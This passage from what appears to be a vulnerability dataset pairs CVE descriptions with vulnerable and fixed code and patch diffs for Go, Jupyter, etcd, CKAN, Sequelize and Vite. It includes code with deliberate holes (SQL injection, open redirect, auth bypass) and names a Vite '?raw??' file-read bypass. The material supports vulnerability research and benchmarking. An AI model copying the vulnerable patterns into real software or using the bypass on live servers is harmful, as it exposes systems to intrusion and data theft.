err\n\t}\n\n\tif ctx.request.MultipartForm != nil {\n\t\tif fhs := ctx.request.MultipartForm.File; fhs != nil {\n\t\t\tfor _, files := range fhs {\n\t\t\tinnerLoop:\n\t\t\t\tfor _, file := range files {\n\t\t\t\t\t// Security fix for go < 1.17.5:\n\t\t\t\t\t// Reported by Kirill Efimov (snyk.io) through security reports.\n\t\t\t\t\tfile.Filename = filepath.Base(file.Filename)\n\n\t\t\t\t\tfor _, b := range before {\n\t\t\t\t\t\tif !b(ctx, file) {\n\t\t\t\t\t\t\tcontinue innerLoop\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tn0, err0 := ctx.SaveFormFile(file, filepath.Join(destDirectory, file.Filename))\n\t\t\t\t\tif err0 != nil {\n\t\t\t\t\t\treturn nil, 0, err0\n\t\t\t\t\t}\n\t\t\t\t\tn += n0\n\n\t\t\t\t\tuploaded = append(uploaded, file)\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn uploaded, n, nil\n\t\t}\n\t}\n\n\treturn nil, 0, http.ErrMissingFile\n}"}], "vul_patch": "--- a/context/context.go\n+++ b/context/context.go\n@@ -12,13 +12,7 @@\n \n \t\tinnerLoop:\n \t\t\tfor _, header := range fhs[key] {\n-\t\t\t\t// Fix an issue that net/http has,\n-\t\t\t\t// an attacker can push a filename\n-\t\t\t\t// which could lead to override existing system files\n-\t\t\t\t// by ../../$header.\n-\t\t\t\t// Reported by Frank through security reports.\n-\t\t\t\theader.Filename = strings.ReplaceAll(header.Filename, \"../\", \"\")\n-\t\t\t\theader.Filename = strings.ReplaceAll(header.Filename, \"..\\\\\", \"\")\n+\t\t\t\theader.Filename = filepath.Base(header.Filename)\n \n \t\t\t\tfor _, b := range before {\n \t\t\t\t\tif !b(ctx, header) {\n\n--- a/context/context.go\n+++ b/context/context.go\n@@ -9,13 +9,9 @@\n \t\t\tfor _, files := range fhs {\n \t\t\tinnerLoop:\n \t\t\t\tfor _, file := range files {\n-\t\t\t\t\t// Fix an issue that net/http has,\n-\t\t\t\t\t// an attacker can push a filename\n-\t\t\t\t\t// which could lead to override existing system files\n-\t\t\t\t\t// by ../../$file.\n-\t\t\t\t\t// Reported by Frank through security reports.\n-\t\t\t\t\tfile.Filename = strings.ReplaceAll(file.Filename, \"../\", \"\")\n-\t\t\t\t\tfile.Filename = strings.ReplaceAll(file.Filename, \"..\\\\\", \"\")\n+\t\t\t\t\t// Security fix for go < 1.17.5:\n+\t\t\t\t\t// Reported by Kirill Efimov (snyk.io) through security reports.\n+\t\t\t\t\tfile.Filename = filepath.Base(file.Filename)\n \n \t\t\t\t\tfor _, b := range before {\n \t\t\t\t\t\tif !b(ctx, file) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-26275", "cve_description": "The Jupyter Server provides the backend (i.e. the core services, APIs, and REST endpoints) for Jupyter web applications like Jupyter notebook, JupyterLab, and Voila. In Jupyter Server before version 1.1.1, an open redirect vulnerability could cause the jupyter server to redirect the browser to a different malicious website. All jupyter servers running without a base_url prefix are technically affected, however, these maliciously crafted links can only be reasonably made for known jupyter server hosts. A link to your jupyter server may *appear* safe, but ultimately redirect to a spoofed server on the public internet. This same vulnerability was patched in upstream notebook v5.7.8. This is fixed in jupyter_server 1.1.1. If upgrade is not available, a workaround can be to run your server on a url prefix: \"jupyter server --ServerApp.base_url=/jupyter/\".", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/jupyter-server/jupyter_server", "patch_url": ["https://github.com/jupyter-server/jupyter_server/commit/85e4abccf6ea9321d29153f73b0bd72ccb3a6bca"], "programing_language": "Python", "vul_func": [{"id": "vul_py_388_1", "commit": "b328e0a98fa553d3ec4cd911b6d11bb7363ddb0f", "file_path": "jupyter_server/auth/login.py", "start_line": 30, "end_line": 55, "snippet": " def _redirect_safe(self, url, default=None):\n \"\"\"Redirect if url is on our PATH\n\n Full-domain redirects are allowed if they pass our CORS origin checks.\n\n Otherwise use default (self.base_url if unspecified).\n \"\"\"\n if default is None:\n default = self.base_url\n if not url.startswith(self.base_url):\n # require that next_url be absolute path within our path\n allow = False\n # OR pass our cross-origin check\n if '://' in url:\n # if full URL, run our cross-origin check:\n parsed = urlparse(url.lower())\n origin = '%s://%s' % (parsed.scheme, parsed.netloc)\n if self.allow_origin:\n allow = self.allow_origin == origin\n elif self.allow_origin_pat:\n allow = bool(self.allow_origin_pat.match(origin))\n if not allow:\n # not allowed, use default\n self.log.warning(\"Not allowing login redirect to %r\" % url)\n url = default\n self.redirect(url)"}, {"id": "vul_py_388_2", "commit": "b328e0a98fa553d3ec4cd911b6d11bb7363ddb0f", "file_path": "jupyter_server/auth/login.py", "start_line": 71, "end_line": 92, "snippet": " def post(self):\n typed_password = self.get_argument('password', default=u'')\n new_password = self.get_argument('new_password', default=u'')\n\n if self.get_login_available(self.settings):\n if self.passwd_check(self.hashed_password, typed_password) and not new_password:\n self.set_login_cookie(self, uuid.uuid4().hex)\n elif self.token and self.token == typed_password:\n self.set_login_cookie(self, uuid.uuid4().hex)\n if new_password and self.settings.get('allow_password_change'):\n config_dir = self.settings.get('config_dir')\n config_file = os.path.join(config_dir, 'jupyter_server_config.json')\n set_password(new_password, config_file=config_file)\n self.log.info(\"Wrote hashed password to %s\" % config_file)\n else:\n self.set_status(401)\n self._render(message={'error': 'Invalid credentials'})\n return\n\n\n next_url = self.get_argument('next', default=self.base_url)\n self._redirect_safe(next_url)"}], "fix_func": [{"id": "fix_py_388_1", "commit": "85e4abccf6ea9321d29153f73b0bd72ccb3a6bca", "file_path": "jupyter_server/auth/login.py", "start_line": 30, "end_line": 60, "snippet": " def _redirect_safe(self, url, default=None):\n \"\"\"Redirect if url is on our PATH\n\n Full-domain redirects are allowed if they pass our CORS origin checks.\n\n Otherwise use default (self.base_url if unspecified).\n \"\"\"\n if default is None:\n default = self.base_url\n # protect chrome users from mishandling unescaped backslashes.\n # \\ is not valid in urls, but some browsers treat it as /\n # instead of %5C, causing `\\\\` to behave as `//`\n url = url.replace(\"\\\\\", \"%5C\")\n parsed = urlparse(url)\n if parsed.netloc or not (parsed.path + \"/\").startswith(self.base_url):\n # require that next_url be absolute path within our path\n allow = False\n # OR pass our cross-origin check\n if parsed.netloc:\n # if full URL, run our cross-origin check:\n origin = '%s://%s' % (parsed.scheme, parsed.netloc)\n origin = origin.lower()\n if self.allow_origin:\n allow = self.allow_origin == origin\n elif self.allow_origin_pat:\n allow = bool(self.allow_origin_pat.match(origin))\n if not allow:\n # not allowed, use default\n self.log.warning(\"Not allowing login redirect to %r\" % url)\n url = default\n self.redirect(url)"}, {"id": "fix_py_388_2", "commit": "85e4abccf6ea9321d29153f73b0bd72ccb3a6bca", "file_path": "jupyter_server/auth/login.py", "start_line": 76, "end_line": 99, "snippet": " def post(self):\n typed_password = self.get_argument('password', default=u'')\n new_password = self.get_argument('new_password', default=u'')\n\n if self.get_login_available(self.settings):\n if self.passwd_check(self.hashed_password, typed_password) and not new_password:\n self.set_login_cookie(self, uuid.uuid4().hex)\n elif self.token and self.token == typed_password:\n self.set_login_cookie(self, uuid.uuid4().hex)\n if new_password and self.settings.get(\"allow_password_change\"):\n config_dir = self.settings.get(\"config_dir\")\n config_file = os.path.join(\n config_dir, \"jupyter_notebook_config.json\"\n )\n set_password(new_password, config_file=config_file)\n self.log.info(\"Wrote hashed password to %s\" % config_file)\n else:\n self.set_status(401)\n self._render(message={'error': 'Invalid credentials'})\n return\n\n\n next_url = self.get_argument('next', default=self.base_url)\n self._redirect_safe(next_url)"}], "vul_patch": "--- a/jupyter_server/auth/login.py\n+++ b/jupyter_server/auth/login.py\n@@ -7,14 +7,19 @@\n \"\"\"\n if default is None:\n default = self.base_url\n- if not url.startswith(self.base_url):\n+ # protect chrome users from mishandling unescaped backslashes.\n+ # \\ is not valid in urls, but some browsers treat it as /\n+ # instead of %5C, causing `\\\\` to behave as `//`\n+ url = url.replace(\"\\\\\", \"%5C\")\n+ parsed = urlparse(url)\n+ if parsed.netloc or not (parsed.path + \"/\").startswith(self.base_url):\n # require that next_url be absolute path within our path\n allow = False\n # OR pass our cross-origin check\n- if '://' in url:\n+ if parsed.netloc:\n # if full URL, run our cross-origin check:\n- parsed = urlparse(url.lower())\n origin = '%s://%s' % (parsed.scheme, parsed.netloc)\n+ origin = origin.lower()\n if self.allow_origin:\n allow = self.allow_origin == origin\n elif self.allow_origin_pat:\n\n--- a/jupyter_server/auth/login.py\n+++ b/jupyter_server/auth/login.py\n@@ -7,9 +7,11 @@\n self.set_login_cookie(self, uuid.uuid4().hex)\n elif self.token and self.token == typed_password:\n self.set_login_cookie(self, uuid.uuid4().hex)\n- if new_password and self.settings.get('allow_password_change'):\n- config_dir = self.settings.get('config_dir')\n- config_file = os.path.join(config_dir, 'jupyter_server_config.json')\n+ if new_password and self.settings.get(\"allow_password_change\"):\n+ config_dir = self.settings.get(\"config_dir\")\n+ config_file = os.path.join(\n+ config_dir, \"jupyter_notebook_config.json\"\n+ )\n set_password(new_password, config_file=config_file)\n self.log.info(\"Wrote hashed password to %s\" % config_file)\n else:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-16886", "cve_description": "etcd versions 3.2.x before 3.2.26 and 3.3.x before 3.3.11 are vulnerable to an improper authentication issue when role-based access control (RBAC) is used and client-cert-auth is enabled. If an etcd client server TLS certificate contains a Common Name (CN) which matches a valid RBAC username, a remote attacker may authenticate as that user with any valid (trusted) client certificate in a REST API request to the gRPC-gateway.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/etcd-io/etcd", "patch_url": ["https://github.com/etcd-io/etcd/commit/bf9d0d8291dc71ecbfb2690612954e1a298154b2", "https://github.com/etcd-io/etcd/commit/0191509637546621d6f2e18e074e955ab8ef374d"], "programing_language": "Go", "vul_func": [{"id": "vul_go_158_1", "commit": "9c6b407", "file_path": "auth/store.go", "start_line": 1154, "end_line": 1182, "snippet": "func (as *authStore) AuthInfoFromTLS(ctx context.Context) (ai *AuthInfo) {\n\tpeer, ok := peer.FromContext(ctx)\n\tif !ok || peer == nil || peer.AuthInfo == nil {\n\t\treturn nil\n\t}\n\n\ttlsInfo := peer.AuthInfo.(credentials.TLSInfo)\n\tfor _, chains := range tlsInfo.State.VerifiedChains {\n\t\tif len(chains) < 1 {\n\t\t\tcontinue\n\t\t}\n\t\tai = &AuthInfo{\n\t\t\tUsername: chains[0].Subject.CommonName,\n\t\t\tRevision: as.Revision(),\n\t\t}\n\t\tif as.lg != nil {\n\t\t\tas.lg.Debug(\n\t\t\t\t\"found command name\",\n\t\t\t\tzap.String(\"common-name\", ai.Username),\n\t\t\t\tzap.String(\"user-name\", ai.Username),\n\t\t\t\tzap.Uint64(\"revision\", ai.Revision),\n\t\t\t)\n\t\t} else {\n\t\t\tplog.Debugf(\"found common name %s\", ai.Username)\n\t\t}\n\t\tbreak\n\t}\n\treturn ai\n}"}], "fix_func": [{"id": "fix_go_158_1", "commit": "bf9d0d8", "file_path": "auth/store.go", "start_line": 1154, "end_line": 1203, "snippet": "func (as *authStore) AuthInfoFromTLS(ctx context.Context) (ai *AuthInfo) {\n\tpeer, ok := peer.FromContext(ctx)\n\tif !ok || peer == nil || peer.AuthInfo == nil {\n\t\treturn nil\n\t}\n\n\ttlsInfo := peer.AuthInfo.(credentials.TLSInfo)\n\tfor _, chains := range tlsInfo.State.VerifiedChains {\n\t\tif len(chains) < 1 {\n\t\t\tcontinue\n\t\t}\n\t\tai = &AuthInfo{\n\t\t\tUsername: chains[0].Subject.CommonName,\n\t\t\tRevision: as.Revision(),\n\t\t}\n\t\tmd, ok := metadata.FromIncomingContext(ctx)\n\t\tif !ok {\n\t\t\treturn nil\n\t\t}\n\n\t\t// gRPC-gateway proxy request to etcd server includes Grpcgateway-Accept\n\t\t// header. The proxy uses etcd client server certificate. If the certificate\n\t\t// has a CommonName we should never use this for authentication.\n\t\tif gw := md[\"grpcgateway-accept\"]; len(gw) > 0 {\n\t\t\tif as.lg != nil {\n\t\t\t\tas.lg.Warn(\n\t\t\t\t\t\"ignoring common name in gRPC-gateway proxy request\",\n\t\t\t\t\tzap.String(\"common-name\", ai.Username),\n\t\t\t\t\tzap.String(\"user-name\", ai.Username),\n\t\t\t\t\tzap.Uint64(\"revision\", ai.Revision),\n\t\t\t\t)\n\t\t\t} else {\n\t\t\t\tplog.Warningf(\"ignoring common name in gRPC-gateway proxy request %s\", ai.Username)\n\t\t\t}\n\t\t\treturn nil\n\t\t}\n\t\tif as.lg != nil {\n\t\t\tas.lg.Debug(\n\t\t\t\t\"found command name\",\n\t\t\t\tzap.String(\"common-name\", ai.Username),\n\t\t\t\tzap.String(\"user-name\", ai.Username),\n\t\t\t\tzap.Uint64(\"revision\", ai.Revision),\n\t\t\t)\n\t\t} else {\n\t\t\tplog.Debugf(\"found common name %s\", ai.Username)\n\t\t}\n\t\tbreak\n\t}\n\treturn ai\n}"}], "vul_patch": "--- a/auth/store.go\n+++ b/auth/store.go\n@@ -13,6 +13,27 @@\n \t\t\tUsername: chains[0].Subject.CommonName,\n \t\t\tRevision: as.Revision(),\n \t\t}\n+\t\tmd, ok := metadata.FromIncomingContext(ctx)\n+\t\tif !ok {\n+\t\t\treturn nil\n+\t\t}\n+\n+\t\t// gRPC-gateway proxy request to etcd server includes Grpcgateway-Accept\n+\t\t// header. The proxy uses etcd client server certificate. If the certificate\n+\t\t// has a CommonName we should never use this for authentication.\n+\t\tif gw := md[\"grpcgateway-accept\"]; len(gw) > 0 {\n+\t\t\tif as.lg != nil {\n+\t\t\t\tas.lg.Warn(\n+\t\t\t\t\t\"ignoring common name in gRPC-gateway proxy request\",\n+\t\t\t\t\tzap.String(\"common-name\", ai.Username),\n+\t\t\t\t\tzap.String(\"user-name\", ai.Username),\n+\t\t\t\t\tzap.Uint64(\"revision\", ai.Revision),\n+\t\t\t\t)\n+\t\t\t} else {\n+\t\t\t\tplog.Warningf(\"ignoring common name in gRPC-gateway proxy request %s\", ai.Username)\n+\t\t\t}\n+\t\t\treturn nil\n+\t\t}\n \t\tif as.lg != nil {\n \t\t\tas.lg.Debug(\n \t\t\t\t\"found command name\",\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-32696", "cve_description": "CKAN is an open-source data management system for powering data hubs and data portals. Prior to versions 2.9.9 and 2.10.1, the `ckan` user (equivalent to www-data) owned code and configuration files in the docker container and the `ckan` user had the permissions to use sudo. These issues allowed for code execution or privilege escalation if an arbitrary file write bug was available. Versions 2.9.9, 2.9.9-dev, 2.10.1, and 2.10.1-dev contain a patch.\n\n\n\n", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/ckan/ckan-docker-base", "patch_url": ["https://github.com/ckan/ckan-docker-base/commit/5483c46ce9b518a4e1b626ef7032cce2c1d75c7d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_236_1", "commit": "f145acd", "file_path": "ckan-2.10/base/setup/prerun.py", "start_line": 160, "end_line": 196, "snippet": "def create_sysadmin():\n\n name = os.environ.get(\"CKAN_SYSADMIN_NAME\")\n password = os.environ.get(\"CKAN_SYSADMIN_PASSWORD\")\n email = os.environ.get(\"CKAN_SYSADMIN_EMAIL\")\n\n if name and password and email:\n\n # Check if user exists\n command = [\"ckan\", \"-c\", ckan_ini, \"user\", \"show\", name]\n\n out = subprocess.check_output(command)\n if b\"User:None\" not in re.sub(b\"\\s\", b\"\", out):\n print(\"[prerun] Sysadmin user exists, skipping creation\")\n return\n\n # Create user\n command = [\n \"ckan\",\n \"-c\",\n ckan_ini,\n \"user\",\n \"add\",\n name,\n \"password=\" + password,\n \"email=\" + email,\n ]\n\n subprocess.call(command)\n print(\"[prerun] Created user {0}\".format(name))\n\n # Make it sysadmin\n command = [\"ckan\", \"-c\", ckan_ini, \"sysadmin\", \"add\", name]\n\n subprocess.call(command)\n print(\"[prerun] Made user {0} a sysadmin\".format(name))\n"}], "fix_func": [{"id": "fix_py_236_1", "commit": "5483c46", "file_path": "ckan-2.10/base/setup/prerun.py", "start_line": 160, "end_line": 203, "snippet": "def create_sysadmin():\n\n name = os.environ.get(\"CKAN_SYSADMIN_NAME\")\n password = os.environ.get(\"CKAN_SYSADMIN_PASSWORD\")\n email = os.environ.get(\"CKAN_SYSADMIN_EMAIL\")\n\n if name and password and email:\n\n # Check if user exists\n command = [\"ckan\", \"-c\", ckan_ini, \"user\", \"show\", name]\n\n out = subprocess.check_output(command)\n if b\"User:None\" not in re.sub(b\"\\s\", b\"\", out):\n print(\"[prerun] Sysadmin user exists, skipping creation\")\n return\n\n # Create user\n command = [\n \"ckan\",\n \"-c\",\n ckan_ini,\n \"user\",\n \"add\",\n name,\n \"password=\" + password,\n \"email=\" + email,\n ]\n\n subprocess.call(command)\n print(\"[prerun] Created user {0}\".format(name))\n\n # Make it sysadmin\n command = [\"ckan\", \"-c\", ckan_ini, \"sysadmin\", \"add\", name]\n\n subprocess.call(command)\n print(\"[prerun] Made user {0} a sysadmin\".format(name))\n\n # cleanup permissions\n # We're running as root before pivoting to uwsgi and dropping privs\n data_dir = \"%s/storage\" % os.environ['CKAN_STORAGE_PATH']\n\n command = [\"chown\", \"-R\", \"ckan:ckan\", data_dir]\n subprocess.call(command)\n print(\"[prerun] Ensured storage directory is owned by ckan\")"}], "vul_patch": "--- a/ckan-2.10/base/setup/prerun.py\n+++ b/ckan-2.10/base/setup/prerun.py\n@@ -34,3 +34,11 @@\n \n subprocess.call(command)\n print(\"[prerun] Made user {0} a sysadmin\".format(name))\n+\n+ # cleanup permissions\n+ # We're running as root before pivoting to uwsgi and dropping privs\n+ data_dir = \"%s/storage\" % os.environ['CKAN_STORAGE_PATH']\n+\n+ command = [\"chown\", \"-R\", \"ckan:ckan\", data_dir]\n+ subprocess.call(command)\n+ print(\"[prerun] Ensured storage directory is owned by ckan\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-10749", "cve_description": "sequelize before version 3.35.1 allows attackers to perform a SQL Injection due to the JSON path keys not being properly sanitized in the Postgres dialect.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/sequelize/sequelize", "patch_url": ["https://github.com/sequelize/sequelize/commit/ee4017379db0059566ecb5424274ad4e2d66bc68"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_209_1", "commit": "75c1fdb", "file_path": "lib/dialects/abstract/query-generator.js", "start_line": 2187, "end_line": 2209, "snippet": " traverse = function (prop, item, path) {\n var $where = {}\n , $key\n , $cast\n , $baseKey\n , $tmp\n , castKey;\n\n if (path[path.length - 1].indexOf('::') > -1) {\n $tmp = path[path.length - 1].split('::');\n $cast = $tmp[1];\n path[path.length - 1] = $tmp[0];\n }\n\n $baseKey = self.quoteIdentifier(key)+'#>>\\'{'+path.join(', ')+'}\\'';\n\n if (options.prefix) {\n if (options.prefix instanceof Utils.literal) {\n $baseKey = self.handleSequelizeMethod(options.prefix)+'.'+$baseKey;\n } else {\n $baseKey = self.quoteTable(options.prefix)+'.'+$baseKey;\n }\n }"}], "fix_func": [{"id": "fix_js_209_1", "commit": "ee4017379db0059566ecb5424274ad4e2d66bc68", "file_path": "lib/dialects/abstract/query-generator.js", "start_line": 2187, "end_line": 2210, "snippet": " traverse = function (prop, item, path) {\n var $where = {}\n , $key\n , $cast\n , $baseKey\n , $tmp\n , castKey;\n\n if (path[path.length - 1].indexOf('::') > -1) {\n $tmp = path[path.length - 1].split('::');\n $cast = $tmp[1];\n path[path.length - 1] = $tmp[0];\n }\n\n var pathKey = self.escape('{' + path.join(', ') + '}');\n $baseKey = self.quoteIdentifier(key)+'#>>'+pathKey;\n\n if (options.prefix) {\n if (options.prefix instanceof Utils.literal) {\n $baseKey = self.handleSequelizeMethod(options.prefix)+'.'+$baseKey;\n } else {\n $baseKey = self.quoteTable(options.prefix)+'.'+$baseKey;\n }\n }"}], "vul_patch": "--- a/lib/dialects/abstract/query-generator.js\n+++ b/lib/dialects/abstract/query-generator.js\n@@ -12,7 +12,8 @@\n path[path.length - 1] = $tmp[0];\n }\n \n- $baseKey = self.quoteIdentifier(key)+'#>>\\'{'+path.join(', ')+'}\\'';\n+ var pathKey = self.escape('{' + path.join(', ') + '}');\n+ $baseKey = self.quoteIdentifier(key)+'#>>'+pathKey;\n \n if (options.prefix) {\n if (options.prefix instanceof Utils.literal) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-30208", "cve_description": "Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/vitejs/vite", "patch_url": ["https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_248_1", "commit": "50641d9", "file_path": "packages/vite/src/node/server/middlewares/transform.ts", "start_line": 57, "end_line": 279, "snippet": " return async function viteTransformMiddleware(req, res, next) {\n if (req.method !== 'GET' || knownIgnoreList.has(req.url!)) {\n return next()\n }\n\n let url: string\n try {\n url = decodeURI(removeTimestampQuery(req.url!)).replace(\n NULL_BYTE_PLACEHOLDER,\n '\\0',\n )\n } catch (e) {\n return next(e)\n }\n\n const withoutQuery = cleanUrl(url)\n\n try {\n const isSourceMap = withoutQuery.endsWith('.map')\n // since we generate source map references, handle those requests here\n if (isSourceMap) {\n const depsOptimizer = getDepsOptimizer(server.config, false) // non-ssr\n if (depsOptimizer?.isOptimizedDepUrl(url)) {\n // If the browser is requesting a source map for an optimized dep, it\n // means that the dependency has already been pre-bundled and loaded\n const sourcemapPath = url.startsWith(FS_PREFIX)\n ? fsPathFromId(url)\n : normalizePath(path.resolve(root, url.slice(1)))\n try {\n const map = JSON.parse(\n await fsp.readFile(sourcemapPath, 'utf-8'),\n ) as ExistingRawSourceMap\n\n applySourcemapIgnoreList(\n map,\n sourcemapPath,\n server.config.server.sourcemapIgnoreList,\n logger,\n )\n\n return send(req, res, JSON.stringify(map), 'json', {\n headers: server.config.server.headers,\n })\n } catch (e) {\n // Outdated source map request for optimized deps, this isn't an error\n // but part of the normal flow when re-optimizing after missing deps\n // Send back an empty source map so the browser doesn't issue warnings\n const dummySourceMap = {\n version: 3,\n file: sourcemapPath.replace(/\\.map$/, ''),\n sources: [],\n sourcesContent: [],\n names: [],\n mappings: ';;;;;;;;;',\n }\n return send(req, res, JSON.stringify(dummySourceMap), 'json', {\n cacheControl: 'no-cache',\n headers: server.config.server.headers,\n })\n }\n } else {\n const originalUrl = url.replace(/\\.map($|\\?)/, '$1')\n const map = (await moduleGraph.getModuleByUrl(originalUrl, false))\n ?.transformResult?.map\n if (map) {\n return send(req, res, JSON.stringify(map), 'json', {\n headers: server.config.server.headers,\n })\n } else {\n return next()\n }\n }\n }\n\n // check if public dir is inside root dir\n const publicDir = normalizePath(server.config.publicDir)\n const rootDir = normalizePath(server.config.root)\n if (publicDir.startsWith(withTrailingSlash(rootDir))) {\n const publicPath = `${publicDir.slice(rootDir.length)}/`\n // warn explicit public paths\n if (url.startsWith(withTrailingSlash(publicPath))) {\n let warning: string\n\n if (isImportRequest(url)) {\n const rawUrl = removeImportQuery(url)\n if (urlRE.test(url)) {\n warning =\n `Assets in the public directory are served at the root path.\\n` +\n `Instead of ${colors.cyan(rawUrl)}, use ${colors.cyan(\n rawUrl.replace(publicPath, '/'),\n )}.`\n } else {\n warning =\n 'Assets in public directory cannot be imported from JavaScript.\\n' +\n `If you intend to import that asset, put the file in the src directory, and use ${colors.cyan(\n rawUrl.replace(publicPath, '/src/'),\n )} instead of ${colors.cyan(rawUrl)}.\\n` +\n `If you intend to use the URL of that asset, use ${colors.cyan(\n injectQuery(rawUrl.replace(publicPath, '/'), 'url'),\n )}.`\n }\n } else {\n warning =\n `files in the public directory are served at the root path.\\n` +\n `Instead of ${colors.cyan(url)}, use ${colors.cyan(\n url.replace(publicPath, '/'),\n )}.`\n }\n\n logger.warn(colors.yellow(warning))\n }\n }\n\n if (\n (rawRE.test(url) || urlRE.test(url)) &&\n !ensureServingAccess(url, server, res, next)\n ) {\n return\n }\n\n if (\n isJSRequest(url) ||\n isImportRequest(url) ||\n isCSSRequest(url) ||\n isHTMLProxy(url)\n ) {\n // strip ?import\n url = removeImportQuery(url)\n // Strip valid id prefix. This is prepended to resolved Ids that are\n // not valid browser import specifiers by the importAnalysis plugin.\n url = unwrapId(url)\n\n // for CSS, we need to differentiate between normal CSS requests and\n // imports\n if (\n isCSSRequest(url) &&\n !isDirectRequest(url) &&\n req.headers.accept?.includes('text/css')\n ) {\n url = injectQuery(url, 'direct')\n }\n\n // check if we can return 304 early\n const ifNoneMatch = req.headers['if-none-match']\n if (\n ifNoneMatch &&\n (await moduleGraph.getModuleByUrl(url, false))?.transformResult\n ?.etag === ifNoneMatch\n ) {\n debugCache?.(`[304] ${prettifyUrl(url, root)}`)\n res.statusCode = 304\n return res.end()\n }\n\n // resolve, load and transform using the plugin container\n const result = await transformRequest(url, server, {\n html: req.headers.accept?.includes('text/html'),\n })\n if (result) {\n const depsOptimizer = getDepsOptimizer(server.config, false) // non-ssr\n const type = isDirectCSSRequest(url) ? 'css' : 'js'\n const isDep =\n DEP_VERSION_RE.test(url) || depsOptimizer?.isOptimizedDepUrl(url)\n return send(req, res, result.code, type, {\n etag: result.etag,\n // allow browser to cache npm deps!\n cacheControl: isDep ? 'max-age=31536000,immutable' : 'no-cache',\n headers: server.config.server.headers,\n map: result.map,\n })\n }\n }\n } catch (e) {\n if (e?.code === ERR_OPTIMIZE_DEPS_PROCESSING_ERROR) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Optimize Deps Processing Error'\n res.end()\n }\n // This timeout is unexpected\n logger.error(e.message)\n return\n }\n if (e?.code === ERR_OUTDATED_OPTIMIZED_DEP) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Outdated Optimize Dep'\n res.end()\n }\n // We don't need to log an error in this case, the request\n // is outdated because new dependencies were discovered and\n // the new pre-bundle dependencies have changed.\n // A full-page reload has been issued, and these old requests\n // can't be properly fulfilled. This isn't an unexpected\n // error but a normal part of the missing deps discovery flow\n return\n }\n if (e?.code === ERR_CLOSED_SERVER) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Outdated Request'\n res.end()\n }\n // We don't need to log an error in this case, the request\n // is outdated because new dependencies were discovered and\n // the new pre-bundle dependencies have changed.\n // A full-page reload has been issued, and these old requests\n // can't be properly fulfilled. This isn't an unexpected\n // error but a normal part of the missing deps discovery flow\n return\n }\n if (e?.code === ERR_LOAD_URL) {\n // Let other middleware handle if we can't load the url via transformRequest\n return next()\n }\n return next(e)\n }\n\n next()\n }"}], "fix_func": [{"id": "fix_js_248_1", "commit": "315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4", "file_path": "packages/vite/src/node/server/middlewares/transform.ts", "start_line": 58, "end_line": 290, "snippet": " return async function viteTransformMiddleware(req, res, next) {\n if (req.method !== 'GET' || knownIgnoreList.has(req.url!)) {\n return next()\n }\n\n let url: string\n try {\n url = decodeURI(removeTimestampQuery(req.url!)).replace(\n NULL_BYTE_PLACEHOLDER,\n '\\0',\n )\n } catch (e) {\n return next(e)\n }\n\n const withoutQuery = cleanUrl(url)\n\n try {\n const isSourceMap = withoutQuery.endsWith('.map')\n // since we generate source map references, handle those requests here\n if (isSourceMap) {\n const depsOptimizer = getDepsOptimizer(server.config, false) // non-ssr\n if (depsOptimizer?.isOptimizedDepUrl(url)) {\n // If the browser is requesting a source map for an optimized dep, it\n // means that the dependency has already been pre-bundled and loaded\n const sourcemapPath = url.startsWith(FS_PREFIX)\n ? fsPathFromId(url)\n : normalizePath(path.resolve(root, url.slice(1)))\n try {\n const map = JSON.parse(\n await fsp.readFile(sourcemapPath, 'utf-8'),\n ) as ExistingRawSourceMap\n\n applySourcemapIgnoreList(\n map,\n sourcemapPath,\n server.config.server.sourcemapIgnoreList,\n logger,\n )\n\n return send(req, res, JSON.stringify(map), 'json', {\n headers: 